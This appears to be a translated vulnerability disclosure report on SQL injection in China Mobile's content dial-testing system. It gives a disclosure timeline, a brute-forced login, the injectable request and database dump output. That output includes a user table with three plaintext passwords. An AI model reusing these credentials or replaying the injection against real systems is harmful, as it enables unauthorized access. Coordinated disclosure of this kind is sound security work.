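2015-11-06: Details reported to the vendor; awaiting vendor handling
2015-11-10: Vendor confirmed; details disclosed to the vendor only
2015-11-20: Details disclosed to core white hats and experts in related fields
2015-11-30: Details disclosed to regular white hats
2015-12-10: Details disclosed to intern white hats
2015-12-25: Details disclosed to the public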
SQL injection vulnerability in China Mobile's objectionable-content dial-testing system
**.**.**.**:11222/ncss/
Brute-forced login: wanghua 123456
GET /ncss/auditmana/webTree.do?tr=listWebSites&treeId=**.**.**.*** HTTP/1.1
Host: **.**.**.**:11222
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=8D4D5550134B823EFFF04AEF85533DCE
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
available databases [3]:
[*] information_schema
[*] ncss
[*] test
Database: ncss
[1020 tables]
+---------------------------------+
| acquisition_conf_policy |
| alarm_forward_info |
| alarm_info |
| alarm_msg_his |
| alarm_msg_info |
| alarm_msg_per |
| alarm_policy |
| alarm_report_datas |
| alarm_report_his |
| alarm_report_info |
| alarm_rule |
| area_info |
| audit_statinfo |
| audit_user_count |
| con_test |
| daily_audit_time_report |
| data_storage_sheet |
| day_audit_time_report |
| day_bidwinning_amount |
| day_hostname_stat |
| day_hostname_stat_0111 |
| day_report_audit_area_monitor |
| day_report_audit_info |
| day_report_audit_visitsrank |
| day_server_stat |
| day_work_load_report |
| department |
| domain_tree |
| downloadblack |
| equip_conf_send_status |
| evidence |
| evidence_video |
| front_acquisition_policy |
| front_image_policy |
| front_info |
| front_keyword_policy |
| front_text_policy |
| host_display |
| host_reason |
| host_time_baseinfo |
| hostname_test |
| hour_hostname_0105rd |
| hour_hostname_stat |
| hour_server_stat |
| idc_room |
| image_conf_policy |
| image_conf_send_status |
| ip_area |
| keyword |
| keyword_conf_policy |
| keyword_conf_send_status |
| keyword_copy |
| keyword_policy_type |
| keyword_type |
| log_black_list_submit |
| log_black_list_submit_item |
| log_record |
| log_sys_record |
| mobile_area |
| month_bidwinning_amount |
| month_hostname_stat |
| month_server_stat |
| ncss_user |
(omitted...)
Table: ncss_user
[3 entries]
admin jhkj9527
wanghua 123456
yaotingting 123
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-11-10 10:30
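CNVD confirmed and reproduced the issue as described, and it has been forwarded via CNCERT to China Mobile Group, which will coordinate follow-up handling with the website's administrators.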
None yet